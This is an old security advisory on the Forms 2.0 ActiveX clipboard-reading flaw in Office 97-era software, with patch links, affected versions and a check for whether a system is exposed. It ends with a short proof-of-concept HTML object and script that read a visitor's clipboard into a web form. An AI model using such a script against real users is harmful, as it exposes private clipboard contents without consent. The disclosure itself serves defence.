|
|
| |
| Forms 2.0 ActiveX is an ActiveX control that is distributed with any application that includes Visual Basic for Applications 5.0. This ActiveX enables a malicious user to gain access to information stored in the clipboard.
|
| |
Credit:
The vulnerability was found by: Juan Carlos Garcia Cuartango.
Cuartango is known for discovering previous copy & paste bugs in Internet Explorer:
The Cuartango security hole
Another Cuartango security hole
A patch for this security hole can be found at Microsoft:
http://officeupdate.microsoft.com/downloaditems/fm2paste.exe
To test whether you are vulnerable or not go to Cuartango's home page:
http://pages.whowhere.com/computers/cuartangojc/clipboard2.html
Microsoft's Security bulletin about this security hole can be found at:
http://www.microsoft.com/security/bulletins/ms99-001.asp.
|
| |
The Forms 2.0 ActiveX control has allows text to be pasted from a user's Clipboard into a 'Forms 2.0' Text Box or Combo Box. This control is typically installed with the applications listed in the "Affected Products" section below.
A malicious user could use the Forms 2.0 Control to read or export text on a user's Clipboard when that user visits a hostile web site or opens a malicious HTML formatted email.
The Forms 2.0 Security Patch prevents a malicious user from exploiting this vulnerability. Those who install the patch will not lose functionality and will still have the ability to manually paste content from their Clipboard to a 'Forms 2.0' Text Box or Combo Box. Developers who have built Visual Basic for Applications solutions using the Forms 2.0 Control will still be able to paste into Text Boxes and Combo Boxes.
While there have not been any reports of customers being adversely affected by these problems, Microsoft is releasing a patch to address any risks posed by this issue.
Affected Software Versions
The following software installs the Forms 2.0 control:
- Microsoft Office 97
- Microsoft Outlook 98
- Microsoft Project 98
- Microsoft Visual Basic 5.0
- Any third party product that includes Visual Basic for Applications 5.0
To determine whether you need to download and install the security fix, right click the Fm20.dll file in your \Windows\System folder and choose Properties from the shortcut menu. If the file date of your FM20.dll file is earlier than January 11, 1999 (1/11/99(, you should download and install the security fix.
A script making for making public the content of clipboard is very simple:
First insert a Forms 2.0 ActiveX object into a HTML:
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3" width="169" height="23">
<param name="VariousPropertyBits" value="2894088219">
<param name="BackColor" value="16776960">
<param name="Size" value="4480;600">
<param name="FontHeight" value="200">
<param name="FontCharSet" value="0">
<param name="FontPitchAndFamily" value="2">
</object>
Then insert the following VBScript to copy the content of the clipboard into the ActiveX control:
function GetClipBoard()
{
// paste over the Microsoft Forms 2.0 TextBox
tb.paste();
// moves the text to the text area box
document.forms(0).S1.value=tb.text;
if(document.forms(0).S1.value == "")
alert("Your browser does not have the security hole or your clipboard was empty ");
else
alert("Clipboard security hole in browser -- " + navigator.userAgent );
}
|
